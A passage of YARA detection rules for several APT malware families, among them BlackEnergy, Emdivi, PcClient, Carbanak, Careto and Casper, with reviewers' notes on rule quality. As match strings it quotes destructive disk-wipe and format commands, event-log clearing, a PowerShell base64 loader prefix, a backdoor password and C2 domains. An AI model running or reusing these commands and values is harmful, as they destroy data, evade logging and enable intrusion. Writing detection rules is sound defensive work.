        reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
        date = "2016-01-03"
        score = 50
        hash = "0969daac4adc84ab7b50d4f9ffb16c4e1a07c6dbfc968bd6649497c794a161cd"
    strings:
        // Stock Dropbear strings: this rule identifies the tool, not the
        // backdoor; pair it with BlackEnergy_BackdoorPass_DropBear_SSH.
        $s1 = "Dropbear server v%s https://matt.ucc.asn.au/dropbear/dropbear.html" fullword ascii
        $s2 = "Badly formatted command= authorized_keys option" fullword ascii
        $s3 = "This Dropbear program does not support '%s' %s algorithm" fullword ascii
        $s4 = "/etc/dropbear/dropbear_dss_host_key" fullword ascii
        $s5 = "/etc/dropbear/dropbear_rsa_host_key" fullword ascii
    condition:
        // MZ gate: only Windows builds of Dropbear are in scope.
        uint16(0) == 0x5a4d and filesize < 1000KB and 2 of them
}

rule BlackEnergy_BackdoorPass_DropBear_SSH {
    meta:
        description = "Detects the password of the backdoored DropBear SSH Server - BlackEnergy"
        author = "Florian Roth"
        reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
        date = "2016-01-03"
        hash = "0969daac4adc84ab7b50d4f9ffb16c4e1a07c6dbfc968bd6649497c794a161cd"
    strings:
        // Hard-coded backdoor password embedded in the trojanised server.
        $s1 = "passDs5Bu9Te7" fullword ascii
    condition:
        uint16(0) == 0x5a4d and $s1
}

rule BlackEnergy_KillDisk_1 {
    meta:
        description = "Detects KillDisk malware from BlackEnergy"
        author = "Florian Roth"
        reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
        date = "2016-01-03"
        score = 80
        super_rule = 1
        hash1 = "11b7b8a7965b52ebb213b023b6772dd2c76c66893fc96a18a9a33c8cf125af80"
        hash2 = "5d2b1abc7c35de73375dd54a4ec5f0b060ca80a1831dac46ad411b4fe4eac4c6"
        hash3 = "c7536ab90621311b526aefd56003ef8e1166168f038307ae960346ce8f75203d"
        hash4 = "f52869474834be5a6b5df7f8f0c46cbc7e9b22fa5cb30bee0f363ec6eb056b95"
    strings:
        $s0 = "system32\\cmd.exe" fullword ascii
        $s1 = "system32\\icacls.exe" fullword wide
        // Destructive command templates: recursive delete, format, reboot.
        $s2 = "/c del /F /S /Q %c:\\*.*" fullword ascii
        $s3 = "shutdown /r /t %d" fullword ascii
        $s4 = "/C /Q /grant " fullword wide
        $s5 = "%08X.tmp" fullword ascii
        $s6 = "/c format %c: /Y /X /FS:NTFS" fullword ascii
        $s7 = "/c format %c: /Y /Q" fullword ascii
        $s8 = "taskhost.exe" fullword wide /* Goodware String - occured 1 times */
        $s9 = "shutdown.exe" fullword wide /* Goodware String - occured 1 times */
    condition:
        uint16(0) == 0x5a4d and filesize < 500KB and 8 of them
}

rule BlackEnergy_KillDisk_2 {
    meta:
        description = "Detects KillDisk malware from BlackEnergy"
        author = "Florian Roth"
        reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
        date = "2016-01-03"
        score = 80
        super_rule = 1
        hash1 = "11b7b8a7965b52ebb213b023b6772dd2c76c66893fc96a18a9a33c8cf125af80"
        hash2 = "5d2b1abc7c35de73375dd54a4ec5f0b060ca80a1831dac46ad411b4fe4eac4c6"
        hash3 = "f52869474834be5a6b5df7f8f0c46cbc7e9b22fa5cb30bee0f363ec6eb056b95"
    strings:
        $s0 = "%c:\\~tmp%08X.tmp" fullword ascii
        $s1 = "%s%08X.tmp" fullword ascii
        // Concatenated target-extension list (no separators) - very specific.
        $s2 = ".exe.sys.drv.doc.docx.xls.xlsx.mdb.ppt.pptx.xml.jpg.jpeg.ini.inf.ttf" fullword wide
        $s3 = "%ls_%ls_%ls_%d.~tmp" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 500KB and 3 of them
}

rule BlackEnergy_Driver_USBMDM {
    meta:
        description = "Auto-generated rule - from files 7874a10e551377d50264da5906dc07ec31b173dee18867f88ea556ad70d8f094, b73777469f939c331cbc1c9ad703f973d55851f3ad09282ab5b3546befa5b54a, edb16d3ccd50fc8f0f77d0875bf50a629fa38e5ba1b8eeefd54468df97eba281"
        author = "Florian Roth"
        reference = "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/"
        date = "2016-01-04"
        super_rule = 1
        hash1 = "7874a10e551377d50264da5906dc07ec31b173dee18867f88ea556ad70d8f094"
        hash2 = "b73777469f939c331cbc1c9ad703f973d55851f3ad09282ab5b3546befa5b54a"
        hash3 = "edb16d3ccd50fc8f0f77d0875bf50a629fa38e5ba1b8eeefd54468df97eba281"
        hash4 = "ac13b819379855af80ea3499e7fb645f1c96a4a6709792613917df4276c583fc"
        hash5 = "7a393b3eadfc8938cbecf84ca630e56e37d8b3d23e084a12ea5a7955642db291"
        hash6 = "405013e66b6f137f915738e5623228f36c74e362873310c5f2634ca2fda6fbc5"
        hash7 = "244dd8018177ea5a92c70a7be94334fa457c1aab8a1c1ea51580d7da500c3ad5"
        hash8 = "edcd1722fdc2c924382903b7e4580f9b77603110e497393c9947d45d311234bf"
    strings:
        // NOTE(review): $s2/$s3 are ordinary kernel imports (see the goodware
        // counts), so this rule effectively keys on the driver description
        // string plus the 180KB size cap - expect to validate hits by hash.
        $s1 = "USB MDM Driver" fullword wide
        $s2 = "KdDebuggerNotPresent" fullword ascii /* Goodware String - occured 50 times */
        $s3 = "KdDebuggerEnabled" fullword ascii /* Goodware String - occured 69 times */
    condition:
        uint16(0) == 0x5a4d and filesize < 180KB and all of them
}

rule BlackEnergy_Driver_AMDIDE {
    meta:
        description = "Auto-generated rule - from files 32d3121135a835c3347b553b70f3c4c68eef711af02c161f007a9fbaffe7e614, 3432db9cb1fb9daa2f2ac554a0a006be96040d2a7776a072a8db051d064a8be2, 90ba78b6710462c2d97815e8745679942b3b296135490f0095bdc0cd97a34d9c, 97be6b2cec90f655ef11ed9feef5b9ef057fd8db7dd11712ddb3702ed7c7bda1"
        author = "Florian Roth"
        reference = "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/"
        date = "2016-01-04"
        super_rule = 1
        hash1 = "32d3121135a835c3347b553b70f3c4c68eef711af02c161f007a9fbaffe7e614"
        hash2 = "3432db9cb1fb9daa2f2ac554a0a006be96040d2a7776a072a8db051d064a8be2"
        hash3 = "90ba78b6710462c2d97815e8745679942b3b296135490f0095bdc0cd97a34d9c"
        hash4 = "97be6b2cec90f655ef11ed9feef5b9ef057fd8db7dd11712ddb3702ed7c7bda1"
        hash5 = "5111de45210751c8e40441f16760bf59856ba798ba99e3c9532a104752bf7bcc"
        hash6 = "cbc4b0aaa30b967a6e29df452c5d7c2a16577cede54d6d705ca1f095bd6d4988"
        hash7 = "1ce0dfe1a6663756a32c69f7494ad082d293d32fe656d7908fb445283ab5fa68"
    strings:
        // Leading space in $s1 is part of the sample's description string.
        $s1 = " AMD IDE driver" fullword wide
        $s2 = "SessionEnv" fullword wide
        // Device-name prefixes with a fixed GUID head; no "fullword" because
        // the remainder of the GUID follows directly.
        $s3 = "\\DosDevices\\{C9059FFF-1C49-4445-83E8-" wide
        $s4 = "\\Device\\{C9059FFF-1C49-4445-83E8-" wide
    condition:
        uint16(0) == 0x5a4d and filesize < 150KB and all of them
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
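*/

rule Emdivi_SFX {
    meta:
        description = "Detects Emdivi malware in SFX Archive"
        author = "Florian Roth @Cyber0ps"
        reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
        date = "2015-08-20"
        score = 70
        hash1 = "7a3c81b2b3c14b9cd913692347019887b607c54152b348d6d3ccd3ecfd406196"
        hash2 = "8c3df4e4549db3ce57fc1f7b1b2dfeedb7ba079f654861ca0b608cbfa1df0f6b"
    strings:
        // SFX script "Setup=" lines naming the dropped payloads.
        $x1 = "Setup=unsecess.exe" fullword ascii
        $x2 = "Setup=leassnp.exe" fullword ascii
        // Generic SFX-stub strings; they only gate, $x* carries the signal.
        $s1 = "&Enter password for the encrypted file:" fullword wide
        $s2 = ";The comment below contains SFX script commands" fullword ascii
        $s3 = "Path=%temp%" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 740KB and (1 of ($x*) and all of ($s*))
}

rule Emdivi_Gen1 {
    meta:
        description = "Detects Emdivi Malware"
        author = "Florian Roth @Cyber0ps"
        reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
        date = "2015-08-20"
        score = 80
        super_rule = 1
        hash1 = "17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24"
        hash2 = "3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1"
        hash3 = "6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662"
        hash4 = "90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86"
    strings:
        // Clears the Security event log via WMI - defence evasion; also a
        // useful standalone hunting string.
        $x1 = "wmic nteventlog where filename=\"SecEvent\" call cleareventlog" fullword wide
        // Wipes dropped artefacts from %Temp%.
        $s0 = "del %Temp%\\*.exe %Temp%\\*.dll %Temp%\\*.bat %Temp%\\*.ps1 %Temp%\\*.cmd /f /q" fullword wide
        $x3 = "userControl-v80.exe" fullword ascii
        $s1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727.42)" fullword wide
        // NCSI probe host/path reused as a connectivity check.
        $s2 = "http://www.msftncsi.com" fullword wide
        $s3 = "net use | find /i \"c$\"" fullword wide
        $s4 = " /del /y & " fullword wide
        $s5 = "\\auto.cfg" fullword wide
        $s6 = "/ncsi.txt" fullword wide
        $s7 = "Dcmd /c" fullword wide
        $s8 = "/PROXY" fullword wide
    condition:
        // "all of them" covers $x* and $s* alike.
        uint16(0) == 0x5a4d and filesize < 800KB and all of them
}

rule Emdivi_Gen2 {
    meta:
        description = "Detects Emdivi Malware"
        author = "Florian Roth @Cyber0ps"
        reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
        date = "2015-08-20"
        super_rule = 1
        score = 80
        hash1 = "9a351885bf5f6fec466f30021088504d96e9db10309622ed198184294717add1"
        hash2 = "a5be7cb1f37030c9f9211c71e0fbe01dae19ff0e6560c5aab393621f18a7d012"
        hash3 = "9183abb9b639699cd2ad28d375febe1f34c14679b7638d1a79edb49d920524a4"
    strings:
        $s1 = "%TEMP%\\IELogs\\" fullword ascii
        $s2 = "MSPUB.EXE" fullword ascii
        $s3 = "%temp%\\" fullword ascii
        $s4 = "\\NOTEPAD.EXE" fullword ascii
        // Timestamp format strings - common in goodware, hence "6 of them".
        $s5 = "%4d-%02d-%02d %02d:%02d:%02d " fullword ascii
        $s6 = "INTERNET_OPEN_TYPE_PRECONFIG" fullword ascii
        $s7 = "%4d%02d%02d%02d%02d%02d" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 1300KB and 6 of them
}

rule Emdivi_Gen3 {
    meta:
        description = "Detects Emdivi Malware"
        author = "Florian Roth @Cyber0ps"
        reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
        date = "2015-08-20"
        super_rule = 1
        score = 80
        hash1 = "008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e"
        hash2 = "a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d"
    strings:
        $x1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727.42)" fullword ascii
        $s2 = "\\Mozilla\\Firefox\\Profiles\\" fullword ascii
        $s4 = "\\auto.cfg" fullword ascii
        $s5 = "/ncsi.txt" fullword ascii
        $s6 = "/en-us/default.aspx" fullword ascii
        $s7 = "cmd /c" fullword ascii
        $s9 = "APPDATA" fullword ascii /* Goodware String - occured 25 times */
    condition:
        // NOTE(review): the first branch is satisfied by the User-Agent plus a
        // single $s string, and $s9 ("APPDATA") is common in goodware, so
        // $x1 + $s9 alone is a weak match - check which strings hit.
        uint16(0) == 0x5a4d and filesize < 850KB and (( $x1 and 1 of ($s*)) or ( 4 of ($s*)))
}

rule Emdivi_Gen4 {
    meta:
        description = "Detects Emdivi Malware"
        author = "Florian Roth @Cyber0ps"
        reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
        date = "2015-08-20"
        super_rule = 1
        score = 80
        hash1 = "008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e"
        hash2 = "17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24"
        hash3 = "3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1"
        hash4 = "6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662"
        hash5 = "90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86"
        hash6 = "a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d"
    strings:
        // Fragments of Firefox prefs.js keys (proxy settings) read by the
        // implant, plus its own status messages.
        $s1 = ".http_port\", " fullword wide
        $s2 = "UserAgent: " fullword ascii
        $s3 = "AUTH FAILED" fullword ascii
        $s4 = "INVALID FILE PATH" fullword ascii
        $s5 = ".autoconfig_url\", \"" fullword wide
        $s6 = "FAILED TO WRITE FILE" fullword ascii
        $s7 = ".proxy" fullword wide
        $s8 = "AuthType: " fullword ascii
        $s9 = ".no_proxies_on\", \"" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 853KB and all of them
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

import "pe"

rule apt_c16_win_memory_pcclient {
    meta:
        author = "@dragonthreatlab"
        md5 = "ec532bbe9d0882d403473102e9724557"
        description = "File matching the md5 above tends to only live in memory, hence the lack of MZ header check."
        date = "2015/01/11"
        reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
    strings:
        $str1 = "Kill You" ascii
        $str2 = "%4d-%02d-%02d %02d:%02d:%02d" ascii
        $str3 = "%4.2f KB" ascii
        // Byte loop: mov cl,[eax] / xor cl,dl / add cl,dl / mov [eax],cl /
        // inc eax / dec esi / jnz - XOR-then-ADD encoding with a one-byte key.
        $encodefunc = {8A 08 32 CA 02 CA 88 08 40 4E 75 F4}
    condition:
        // Intentionally no MZ check so it also matches memory dumps.
        all of them
}

rule apt_c16_win_disk_pcclient {
    meta:
        author = "@dragonthreatlab"
        md5 = "55f84d88d84c221437cd23cdbc541d2e"
        description = "Encoded version of pcclient found on disk"
        date = "2015/01/11"
        reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
    strings:
        // First bytes of the on-disk (encoded) image. The long runs of 06 sit
        // where a PE header normally has zero padding - consistent with an
        // encoding that maps 0x00 to 0x06, but that is not verified here.
        $header = {51 5C 96 06 03 06 06 06 0A 06 06 06 FF FF 06 06 BE 06 06 06 06 06 06 06 46 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 EE 06 06 06 10 1F BC 10 06 BA 0D D1 25 BE 05 52 D1 25 5A 6E 6D 73 26 76 74 6F 67 74 65 71 26 63 65 70 70 6F 7A 26 64 69 26 74 79 70 26 6D 70 26 4A 4F 53 26 71 6F 6A 69 30 11 11 0C 2A 06 06 06 06 06 06 06 73 43 96 1B 37 24 00 4E 37 24 00 4E 37 24 00 4E BA 40 F6 4E 39 24 00 4E 5E 41 FA 4E 33 24 00 4E 5E 41 FC 4E 39 24 00 4E 37 24 FF 4E 0D 24 00 4E FA 31 A3 4E 40 24 00 4E DF 41 F9 4E 36 24 00 4E F6 2A FE 4E 38 24 00 4E DF 41 FC 4E 38 24 00 4E 54 6D 63 6E 37 24 00 4E 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 56 49 06 06 52 05 09 06 5D 87 8C 5A 06 06 06 06 06 06 06 06 E6 06 10 25 0B 05 08 06 06 1C 06 06 06 1A 06 06 06 06 06 06 E5 27 06 06 06 16 06 06 06 36 06 06 06 06 06 16 06 16 06 06 06 04 06 06 0A 06 06 06 06 06 06 06 0A 06 06 06 06 06 06 06 06 76 06 06 06 0A 06 06 06 06 06 06 04 06 06 06 06 06 16 06 06 16 06 06}
    condition:
        $header at 0
}

rule apt_c16_win32_dropper {
    meta:
        author = "@dragonthreatlab"
        md5 = "ad17eff26994df824be36db246c8fb6a"
        description = "APT malware used to drop PcClient RAT"
        date = "2015/01/11"
        reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
    strings:
        $mz = {4D 5A}
        $str1 = "clbcaiq.dll" ascii
        $str2 = "profapi_104" ascii
        $str3 = "/ShowWU" ascii
        $str4 = "Software\\Microsoft\\Windows\\CurrentVersion\\" ascii
        // Inverse of $encodefunc in apt_c16_win_memory_pcclient: sub cl,dl /
        // xor cl,dl (decode), followed by pop esi.
        $str5 = {8A 08 2A CA 32 CA 88 08 40 4E 75 F4 5E}
    condition:
        $mz at 0 and all of ($str*)
}

rule apt_c16_win_swisyn {
    meta:
        author = "@dragonthreatlab"
        md5 = "a6a18c846e5179259eba9de238f67e41"
        // Description corrected: the published text was copied from
        // apt_c16_win_memory_pcclient and claimed there is no MZ check, but
        // this rule does require $mz at offset 0.
        description = "swisyn component (md5 above): MZ header at offset 0 plus /ShowWU, IsWow64Process, regsvr32 and the sub/xor decode sequence"
        date = "2015/01/11"
        reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
    strings:
        $mz = {4D 5A}
        $str1 = "/ShowWU" ascii
        // No modifier = ascii only.
        $str2 = "IsWow64Process"
        $str3 = "regsvr32 "
        // Unoptimised form of the same sub-then-xor byte decode, key held in
        // a stack local ([ebp-4]) and the buffer pointer in [ebp+8].
        $str4 = {8A 11 2A 55 FC 8B 45 08 88 10 8B 4D 08 8A 11 32 55 FC 8B 45 08 88 10}
    condition:
        $mz at 0 and all of ($str*)
}

rule apt_c16_win_wateringhole {
    meta:
        author = "@dragonthreatlab"
        description = "Detects code from APT wateringhole"
        date = "2015/01/11"
        reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
    strings:
        $str1 = "function runmumaa()"
        // NOTE(review): generic PowerShell deflate+base64 loader prefix; with
        // "any of them" it fires on its own, and this construction is not
        // specific to one actor - corroborate with $str1/$str3 or context.
        $str2 = "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("
        $str3 = "function MoSaklgEs7(k)"
    condition:
        any of ($str*)
}

rule apt_c16_win64_dropper {
    meta:
        author = "@dragonthreatlab"
        date = "2015/01/11"
        description = "APT malware used to drop PcClient RAT"
        reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
    strings:
        $mz = { 4D 5A }
        $str1 = "clbcaiq.dll" ascii
        $str2 = "profapi_104" ascii
        $str3 = "\\Microsoft\\wuauclt\\wuauclt.dat" ascii
        // x64 variant of the decode loop: movzx ecx,byte [rdx] / inc rdx /
        // sub cl,3 / xor cl,3 / dec r8 / mov [rdx-1],cl / jnz - key 0x03.
        $str4 = { 0F B6 0A 48 FF C2 80 E9 03 80 F1 03 49 FF C8 88 4A FF 75 EC }
    condition:
        $mz at 0 and all of ($str*)
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.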
*/

/*
   Yara Rule Set
   Author: Florian Roth
   Date: 2015-09-03
   Identifier: Carbanak Rules
*/

/* Rule Set ----------------------------------------------------------------- */

rule Carbanak_0915_1 {
    meta:
        description = "Carbanak Malware"
        author = "Florian Roth"
        reference = "https://www.csis.dk/en/csis/blog/4710/"
        date = "2015-09-03"
        score = 70
    strings:
        // PDB file name and a test-domain artefact left by the build.
        $s1 = "evict1.pdb" fullword ascii
        $s2 = "http://testing.corp 0" fullword ascii
    condition:
        // Either string alone is enough.
        uint16(0) == 0x5a4d and filesize < 100KB and 1 of them
}

rule Carbanak_0915_2 {
    meta:
        description = "Carbanak Malware"
        author = "Florian Roth"
        reference = "https://www.csis.dk/en/csis/blog/4710/"
        date = "2015-09-03"
        score = 70
    strings:
        // Dropped file name - matches on its own (see condition).
        $x1 = "8Rkzy.exe" fullword wide
        // NOTE(review): $s1-$s7 are menu/UI strings of the host application
        // the sample impersonates; "all of ($s*)" may also match that benign
        // application, so a hit via this branch needs the $x1 name or a hash.
        $s1 = "Export Template" fullword wide
        $s2 = "Session folder with name '%s' already exists." fullword ascii
        $s3 = "Show Unconnected Endpoints (Ctrl+U)" fullword ascii
        $s4 = "Close All Documents" fullword wide
        $s5 = "Add &Resource" fullword ascii
        $s6 = "PROCEXPLORER" fullword wide /* Goodware String - occured 1 times */
        $s7 = "AssocQueryKeyA" fullword ascii /* Goodware String - occured 4 times */
    condition:
        uint16(0) == 0x5a4d and filesize < 500KB and ( $x1 or all of ($s*) )
}

rule Carbanak_0915_3 {
    meta:
        description = "Carbanak Malware"
        author = "Florian Roth"
        reference = "https://www.csis.dk/en/csis/blog/4710/"
        date = "2015-09-03"
        score = 70
    strings:
        // Long run of 'w' as a standalone word (padding/filler in the sample).
        $s1 = "wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww" fullword ascii
        $s2 = "SHInvokePrinterCommandA" fullword ascii
        $s3 = "Ycwxnkaj" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 700KB and all of them
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

import "pe"

rule Careto_SGH {
    meta:
        author = "AlienVault (Alberto Ortega)"
        description = "TheMask / Careto SGH component signature"
        reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf"
        date = "2014/02/11"
    strings:
        // Module / export names used by the SGH component.
        $m1 = "PGPsdkDriver" ascii wide fullword
        $m2 = "jpeg1x32" ascii wide fullword
        $m3 = "SkypeIE6Plugin" ascii wide fullword
        $m4 = "CDllUninstall" ascii wide fullword
    condition:
        // Any two names; no MZ or size gate.
        2 of them
}

rule Careto_OSX_SBD {
    meta:
        author = "AlienVault (Alberto Ortega)"
        description = "TheMask / Careto OSX component signature"
        reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf"
        date = "2014/02/11"
    strings:
        /* XORed "/dev/null strdup() setuid(geteuid())" */
        // 24 fixed bytes; the XOR key is not stated here.
        $1 = {FF 16 64 0A 7E 1A 63 4D 21 4D 3E 1E 60 0F 7C 1A 65 0F 74 0B 3E 1C 7F 12}
    condition:
        all of them
}

rule Careto_CnC {
    meta:
        author = "AlienVault (Alberto Ortega)"
        description = "TheMask / Careto CnC communication signature"
        reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf"
        date = "2014/02/11"
    strings:
        // The CGI path is the only specific string; $2-$4 are generic words.
        $1 = "cgi-bin/commcgi.cgi" ascii wide
        $2 = "Group" ascii wide
        $3 = "Install" ascii wide
        // NOTE(review): a 2-byte string (ascii+wide) is a poor scan atom and
        // will be slow on large inputs; it adds little because "all of them"
        // already requires $1.
        $4 = "Bn" ascii wide
    condition:
        all of them
}

rule Careto_CnC_domains {
    meta:
        author = "AlienVault (Alberto Ortega)"
        description = "TheMask / Careto known command and control domains"
        reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf"
        date = "2014/02/11"
    strings:
        $1 = "linkconf.net" ascii wide nocase
        $2 = "redirserver.net" ascii wide nocase
        $3 = "swupdt.com" ascii wide nocase
    condition:
        // Plain domain strings with "any of them": expect hits on threat
        // reports, IOC lists and this rule file itself, not only on samples.
        any of them
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

import "pe"

/* Casper (Win32/ProxyBot.B) rules by Florian Roth. The pe module is imported
   but not referenced by any rule in this section. */

rule Casper_Backdoor_x86
{
    meta:
        description = "Casper French Espionage Malware - Win32/ProxyBot.B - x86 Payload http://goo.gl/VRJNLo"
        author = "Florian Roth"
        reference = "http://goo.gl/VRJNLo"
        date = "2015/03/05"
        hash = "f4c39eddef1c7d99283c7303c1835e99d8e498b0"
        score = 80
    strings:
        // $s*: process / service-description strings
        $s1 = "\"svchost.exe\"" fullword wide
        $s2 = "firefox.exe" fullword ascii
        $s3 = "\"Host Process for Windows Services\"" fullword wide
        // $x*: profile directory wildcards
        $x1 = "\\Users\\*" fullword ascii
        $x2 = "\\Roaming\\Mozilla\\Firefox\\Profiles\\*" fullword ascii
        $x3 = "\\Mozilla\\Firefox\\Profiles\\*" fullword ascii
        $x4 = "\\Documents and Settings\\*" fullword ascii
        // $y*: cookie / URL format strings
        $y1 = "%s; %S=%S" fullword wide
        $y2 = "%s; %s=%s" fullword ascii
        $y3 = "Cookie: %s=%s" fullword ascii
        $y4 = "http://%S:%d" fullword wide
        // $z*: HTTP client artefacts
        $z1 = "http://google.com/" fullword ascii
        $z2 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MALC)" fullword ascii
        $z3 = "Operating System\"" fullword wide
    condition:
        // either the three $s strings, or a combination from the other groups
        ( all of ($s*) ) or ( 3 of ($x*) and 2 of ($y*) and 2 of ($z*) )
}

rule Casper_EXE_Dropper
{
    meta:
        description = "Casper French Espionage Malware - Win32/ProxyBot.B - Dropper http://goo.gl/VRJNLo"
        author = "Florian Roth"
        reference = "http://goo.gl/VRJNLo"
        date = "2015/03/05"
        hash = "e4cc35792a48123e71a2c7b6aa904006343a157a"
        score = 80
    strings:
        $s0 = "<Command>" fullword ascii
        $s1 = "</Command>" fullword ascii
        $s2 = "\" /d \"" fullword ascii
        $s4 = "'%s' %s" fullword ascii
        $s5 = "nKERNEL32.DLL" fullword wide
        $s6 = "@ReturnValue" fullword wide
        $s7 = "ID: 0x%x" fullword ascii
        $s8 = "Name: %S" fullword ascii
    condition:
        // 7 of the 8 defined strings ($s3 is not defined)
        7 of them
}

rule Casper_Included_Strings
{
    meta:
        description = "Casper French Espionage Malware - String Match in File - http://goo.gl/VRJNLo"
        author = "Florian Roth"
        reference = "http://goo.gl/VRJNLo"
        date = "2015/03/06"
        score = 50
    strings:
        $a0 = "cmd.exe /C FOR /L %%i IN (1,1,%d) DO IF EXIST"
        $a1 = "& SYSTEMINFO) ELSE EXIT"
        $mz = { 4d 5a }
        $c1 = "domcommon.exe" wide fullword // File Name
        $c2 = "jpic.gov.sy" fullword // C2 Server
        $c3 = "aiomgr.exe" wide fullword // File Name
        $c4 = "perfaudio.dat" fullword // Temp File Name
        $c5 = "Casper_DLL.dll" fullword // Name
        $c6 = { 7B 4B 59 DE 37 4A 42 26 59 98 63 C6 2D 0F 57 40 } // Decryption Key
        $c7 = "{4216567A-4512-9825-7745F856}" fullword // Mutex
    condition:
        // NOTE: "and" binds tighter than "or" in YARA, so this reads as
        //   all of ($a*) or ( $mz at 0 and 1 of ($c*) )
        // i.e. the MZ check only guards the $c* branch.
        all of ($a*) or ( $mz at 0 ) and ( 1 of ($c*) )
}

rule Casper_SystemInformation_Output
{
    meta:
        description = "Casper French Espionage Malware - System Info Output - http://goo.gl/VRJNLo"
        author = "Florian Roth"
        reference = "http://goo.gl/VRJNLo"
        date = "2015/03/06"
        score = 70
    strings:
        // section headers of the collected system-information report
        $a0 = "***** SYSTEM INFORMATION ******"
        $a1 = "***** SECURITY INFORMATION ******"
        $a2 = "Antivirus: "
        $a3 = "Firewall: "
        $a4 = "***** EXECUTION CONTEXT ******"
        $a5 = "Identity: "
        $a6 = "<CONFIG TIMESTAMP="
    condition:
        all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

/*
   Yara Rule Set
   Author: Florian Roth
   Date: 2015-08-08
   Identifier: Cheshire Cat
   Version: 0.1
*/

/* Rule Set ----------------------------------------------------------------- */

rule CheshireCat_Sample2
{
    meta:
        description = "Auto-generated rule - file dc18850d065ff6a8364421a9c8f9dd5fcce6c7567f4881466cee00e5cd0c7aa8"
        author = "Florian Roth"
        reference = "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/"
        date = "2015-08-08"
        score = 70
        hash = "dc18850d065ff6a8364421a9c8f9dd5fcce6c7567f4881466cee00e5cd0c7aa8"
    strings:
        $s0 = "mpgvwr32.dll" fullword ascii
        $s1 = "Unexpected failure of wait! (%d)" fullword ascii
        $s2 = "\"%s\" /e%d /p%s" fullword ascii
        $s4 = "error in params!" fullword ascii
        $s5 = "sscanf" fullword ascii
        $s6 = "<>Param : 0x%x" fullword ascii
    condition:
        // 0x5a4d little-endian == "MZ" (PE header); size bound limits scan cost
        uint16(0) == 0x5a4d and filesize < 100KB and 4 of ($s*)
}

/* Generic Rules ----------------------------------------------------------- */

/* Gen1 is more exact than Gen2 - until now I had no FPs with Gen2 */
